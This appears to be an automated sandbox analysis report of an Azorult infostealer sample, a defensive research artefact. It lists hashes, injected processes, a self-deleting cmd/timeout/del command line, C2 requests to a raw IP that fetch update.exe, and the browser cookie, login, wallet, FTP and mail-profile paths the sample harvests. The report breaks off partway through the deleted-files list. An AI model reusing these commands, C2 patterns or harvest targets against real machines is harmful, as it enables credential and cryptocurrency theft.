2* ID: 1167
3* MalFamily: "Azorult"
4
5* MalScore: 10.0
6
7* File Name: "AZORult_2c5d4881d9b5ac60e71e03d033f0dbdf.exe"
8* File Size: 663552
9* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
10* SHA256: "f6590e0972571e2c0dde9810f5aa3af78a9813190a13561e195566fb88823a0d"
11* MD5: "2c5d4881d9b5ac60e71e03d033f0dbdf"
12* SHA1: "7d90e9fd7831c8b09f0587b78f6a261e19653170"
13* SHA512: "1f171f1cb6ab875e3d51adf101afdb3e231cde1be6a827359eb7b2d580b171f67c4dd035bf38f6b7a5629ae1c4da3cce5aa9c435bf6257b5af7f0c3e0480b175"
14* CRC32: "65F3CC4F"
15* SSDEEP: "6144:f0ZnddVyNen7hcaYkY2PW71CUBK/f6YTk7PoTRcV6V7kgY9fvVBVBR5jrLCuS0oK:sN8kKdcs6cBDL6D+Vf2DMf"
16
17* Process Execution:
18 "nUlIMci5lDcC.exe",
19 "nUlIMci5lDcC.exe",
20 "cmd.exe",
21 "timeout.exe",
22 "services.exe",
23 "lsass.exe"
24
25
26* Executed Commands:
27 "\"C:\\Users\\user\\AppData\\Local\\Temp\\nUlIMci5lDcC.exe\"",
28 "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"nUlIMci5lDcC.exe\"",
29 "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"nUlIMci5lDcC.exe\"",
30 "C:\\Windows\\system32\\lsass.exe",
31 "C:\\Windows\\system32\\timeout.exe 3"
32
33
34* Signatures Detected:
35
36 "Description": "Behavioural detection: Executable code extraction",
37 "Details":
38
39
40 "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
41 "Details":
42
43
44 "Description": "Anomalous file deletion behavior detected (10+)",
45 "Details":
46
47 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\11276781929694657456500.tmp"
48
49
50 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\113282348866933851038344.tmp"
51
52
53 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\113282962236379443929750.tmp"
54
55
56 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\113283287057947681352380.tmp"
57
58
59 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat"
60
61
62 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat"
63
64
65 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat"
66
67
68 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll"
69
70
71 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll"
72
73
74 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll"
75
76
77 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll"
78
79
80 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll"
81
82
83 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll"
84
85
86 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll"
87
88
89 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll"
90
91
92 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll"
93
94
95 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll"
96
97
98 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll"
99
100
101 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll"
102
103
104 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll"
105
106
107 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll"
108
109
110 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll"
111
112
113 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll"
114
115
116 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll"
117
118
119 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll"
120
121
122 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll"
123
124
125 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll"
126
127
128 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll"
129
130
131 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll"
132
133
134 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll"
135
136
137 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll"
138
139
140 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll"
141
142
143 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll"
144
145
146 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll"
147
148
149 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll"
150
151
152 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll"
153
154
155 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll"
156
157
158 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll"
159
160
161 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll"
162
163
164 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll"
165
166
167 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll"
168
169
170 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll"
171
172
173 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll"
174
175
176 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll"
177
178
179 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll"
180
181
182 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll"
183
184
185 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll"
186
187
188 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll"
189
190
191 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll"
192
193
194 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll"
195
196
197 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll"
198
199
200 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll"
201
202
203 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll"
204
205
206 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll"
207
208
209 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll"
210
211
212 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\nUlIMci5lDcC.exe"
213
214
215
216
217 "Description": "Performs HTTP requests potentially not found in PCAP.",
218 "Details":
219
220 "url_ioc": "45.76.87.43:80//index.php"
221
222
223 "url_ioc": "45.76.87.43:80//index.php"
224
225
226 "url_ioc": "45.76.87.43:80//update.exe"
227
228
229
230
231 "Description": "A process created a hidden window",
232 "Details":
233
234 "Process": "nUlIMci5lDcC.exe -> C:\\Windows\\System32\\cmd.exe"
235
236
237
238
239 "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
240 "Details":
241
242 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
243
244
245 "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
246
247
248 "suspicious_request_iocs": "http://45.76.87.43/index.php"
249
250
251 "suspicious_request_iocs": "http://45.76.87.43/update.exe"
252
253
254
255
256 "Description": "Performs some HTTP requests",
257 "Details":
258
259 "url_iocs": "http://45.76.87.43/index.php"
260
261
262 "url_iocs": "http://45.76.87.43/update.exe"
263
264
265
266
267 "Description": "Uses Windows utilities for basic functionality",
268 "Details":
269
270 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"nUlIMci5lDcC.exe\""
271
272
273 "command": "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"nUlIMci5lDcC.exe\""
274
275
276
277
278 "Description": "Behavioural detection: Injection (Process Hollowing)",
279 "Details":
280
281 "Injection": "nUlIMci5lDcC.exe(3676) -> nUlIMci5lDcC.exe(1992)"
282
283
284
285
286 "Description": "Executed a process and injected code into it, probably while unpacking",
287 "Details":
288
289 "Injection": "nUlIMci5lDcC.exe(3676) -> nUlIMci5lDcC.exe(1992)"
290
291
292
293
294 "Description": "Deletes its original binary from disk",
295 "Details":
296
297
298 "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
299 "Details":
300
301 "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 4910208 times"
302
303
304
305
306 "Description": "Steals private information from local Internet browsers",
307 "Details":
308
309 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@doubleclick1.txt"
310
311
312 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@advertising1.txt"
313
314
315 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.bing2.txt"
316
317
318 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@media2.txt"
319
320
321 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.google1.txt"
322
323
324 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google5.txt"
325
326
327 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google4.txt"
328
329
330 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google3.txt"
331
332
333 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google1.txt"
334
335
336 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.msn2.txt"
337
338
339 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
340
341
342 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@msn1.txt"
343
344
345 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.msn2.txt"
346
347
348 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
349
350
351 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@3lift1.txt"
352
353
354 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@bing2.txt"
355
356
357 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@scorecardresearch2.txt"
358
359
360 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
361
362
363 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@atwola2.txt"
364
365
366
367
368 "Description": "Collects information about installed applications",
369 "Details":
370
371 "Program": "Google Update Helper"
372
373
374
375
376 "Program": "Microsoft Excel MUI 2013"
377
378
379 "Program": "Microsoft Outlook MUI 2013"
380
381
382
383
384 "Program": "Google Chrome"
385
386
387 "Program": "Adobe Flash Player 29 NPAPI"
388
389
390 "Program": "Adobe Flash Player 29 ActiveX"
391
392
393 "Program": "Microsoft DCF MUI 2013"
394
395
396 "Program": "Microsoft Access MUI 2013"
397
398
399 "Program": "Microsoft Office Proofing Tools 2013 - English"
400
401
402 "Program": "Adobe Acrobat Reader DC"
403
404
405 "Program": "Microsoft Publisher MUI 2013"
406
407
408 "Program": "Microsoft Office Shared MUI 2013"
409
410
411 "Program": "Microsoft Office OSM MUI 2013"
412
413
414 "Program": "Microsoft InfoPath MUI 2013"
415
416
417 "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
418
419
420 "Program": "Outils de vérification linguistique 2013 de Microsoft Office - Français"
421
422
423 "Program": "Microsoft Word MUI 2013"
424
425
426 "Program": "Microsoft OneDrive"
427
428
429 "Program": "Microsoft Groove MUI 2013"
430
431
432 "Program": "Microsoft Office Proofing Tools 2013 - Español"
433
434
435
436
437 "Program": "Microsoft Access Setup Metadata MUI 2013"
438
439
440 "Program": "Microsoft Office OSM UX MUI 2013"
441
442
443 "Program": "Java Auto Updater"
444
445
446 "Program": "Microsoft PowerPoint MUI 2013"
447
448
449 "Program": "Microsoft Office Professional Plus 2013"
450
451
452 "Program": "Adobe Refresh Manager"
453
454
455 "Program": "Microsoft Office Proofing 2013"
456
457
458 "Program": "Microsoft Lync MUI 2013"
459
460
461
462
463 "Program": "Microsoft OneNote MUI 2013"
464
465
466
467
468 "Description": "CAPE detected the Azorult malware family",
469 "Details":
470
471
472 "Description": "File has been identified by 15 Antiviruses on VirusTotal as malicious",
473 "Details":
474
475 "McAfee": "Fareit-FPT!2C5D4881D9B5"
476
477
478 "Cylance": "Unsafe"
479
480
481 "F-Prot": "W32/VBKrypt.SQ.gen!Eldorado"
482
483
484 "ESET-NOD32": "a variant of Win32/GenKryptik.DSDK"
485
486
487 "APEX": "Malicious"
488
489
490 "Endgame": "malicious (high confidence)"
491
492
493 "Invincea": "heuristic"
494
495
496 "McAfee-GW-Edition": "BehavesLike.Win32.Fareit.jh"
497
498
499 "Sophos": "Mal/FareitVB-N"
500
501
502 "SentinelOne": "DFI - Malicious PE"
503
504
505 "Cyren": "W32/VBKrypt.SQ.gen!Eldorado"
506
507
508 "Microsoft": "Trojan:Win32/Wacatac.B!ml"
509
510
511 "AhnLab-V3": "Trojan/Win32.Inject.R290159"
512
513
514 "Acronis": "suspicious"
515
516
517 "Qihoo-360": "HEUR/QVM03.0.ADF7.Malware.Gen"
518
519
520
521
522 "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
523 "Details":
524
525
526 "Description": "Attempts to access Bitcoin/ALTCoin wallets",
527 "Details":
528
529 "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallets\\wallet.dat"
530
531
532 "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallets\\wallet.dat"
533
534
535 "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallet.dat"
536
537
538 "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallets\\wallet.dat"
539
540
541 "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallet.dat"
542
543
544 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallets\\wallet.dat"
545
546
547 "file": "C:\\Users\\user\\AppData\\Roaming\\wallets\\wallet.dat"
548
549
550 "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallets\\wallet.dat"
551
552
553 "file": "C:\\Users\\user\\AppData\\wallets\\wallet.dat"
554
555
556 "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallet.dat"
557
558
559 "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallets\\wallet.dat"
560
561
562 "file": "C:\\Users\\user\\AppData\\wallet.dat"
563
564
565 "file": "C:\\Users\\user\\AppData\\Roaming\\wallet.dat"
566
567
568 "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallet.dat"
569
570
571 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallet.dat"
572
573
574 "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallet.dat"
575
576
577 "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\*"
578
579
580
581
582 "Description": "Harvests credentials from local FTP client softwares",
583 "Details":
584
585 "file": "C:\\Users\\user\\AppData\\Roaming\\filezilla\\recentservers.xml"
586
587
588
589
590 "Description": "Harvests information related to installed instant messenger clients",
591 "Details":
592
593 "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
594
595
596
597
598 "Description": "Harvests information related to installed mail clients",
599 "Details":
600
601 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
602
603
604 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
605
606
607 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
608
609
610 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
611
612
613 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
614
615
616 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
617
618
619 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
620
621
622 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
623
624
625 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
626
627
628 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
629
630
631 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
632
633
634 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
635
636
637 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
638
639
640 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
641
642
643 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
644
645
646 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
647
648
649 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
650
651
652 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
653
654
655 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
656
657
658 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
659
660
661 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
662
663
664
665
666 "Description": "Collects information to fingerprint the system",
667 "Details":
668
669
670 "Description": "Created network traffic indicative of malicious activity",
671 "Details":
672
673 "signature": "ET TROJAN Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration"
674
675
676
677
678 "Description": "Uses suspicious command line tools or Windows utilities",
679 "Details":
680
681 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"nUlIMci5lDcC.exe\""
682
683
684 "command": "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"nUlIMci5lDcC.exe\""
685
686
687
688
689
690* Started Service:
691 "VaultSvc"
692
693
694* Mutexes:
695 "A81FB8C60-BBE6E186-FC9B5DB5-36DA4559-33946726"
696
697
698* Modified Files:
699 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
700 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
701 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
702 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
703 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
704 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
705 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
706 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
707 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
708 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
709 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
710 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
711 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
712 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
713 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
714 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
715 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
716 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
717 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
718 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
719 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
720 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
721 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
722 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
723 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
724 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
725 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
726 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
727 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
728 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
729 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
730 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
731 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
732 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
733 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
734 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
735 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
736 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
737 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
738 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
739 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
740 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
741 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
742 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
743 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
744 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
745 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
746 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
747 "C:\\Users\\user\\AppData\\Local\\Temp\\11276781929694657456500.tmp",
748 "C:\\Users\\user\\AppData\\Local\\Temp\\113282348866933851038344.tmp",
749 "C:\\Users\\user\\AppData\\Local\\Temp\\113282962236379443929750.tmp",
750 "C:\\Users\\user\\AppData\\Local\\Temp\\113283287057947681352380.tmp",
751 "C:\\Users\\user\\AppData\\Local\\Temp\\update.exe"
752
753
754* Deleted Files:
755 "C:\\Users\\user\\AppData\\Local\\Temp\\11276781929694657456500.tmp",
756 "C:\\Users\\user\\AppData\\Local\\Temp\\113282348866933851038344.tmp",
757 "C:\\Users\\user\\AppData\\Local\\Temp\\113282962236379443929750.tmp",
758 "C:\\Users\\user\\AppData\\Local\\Temp\\113283287057947681352380.tmp",
759 "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
760 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
761 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
762 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
763 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
764 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
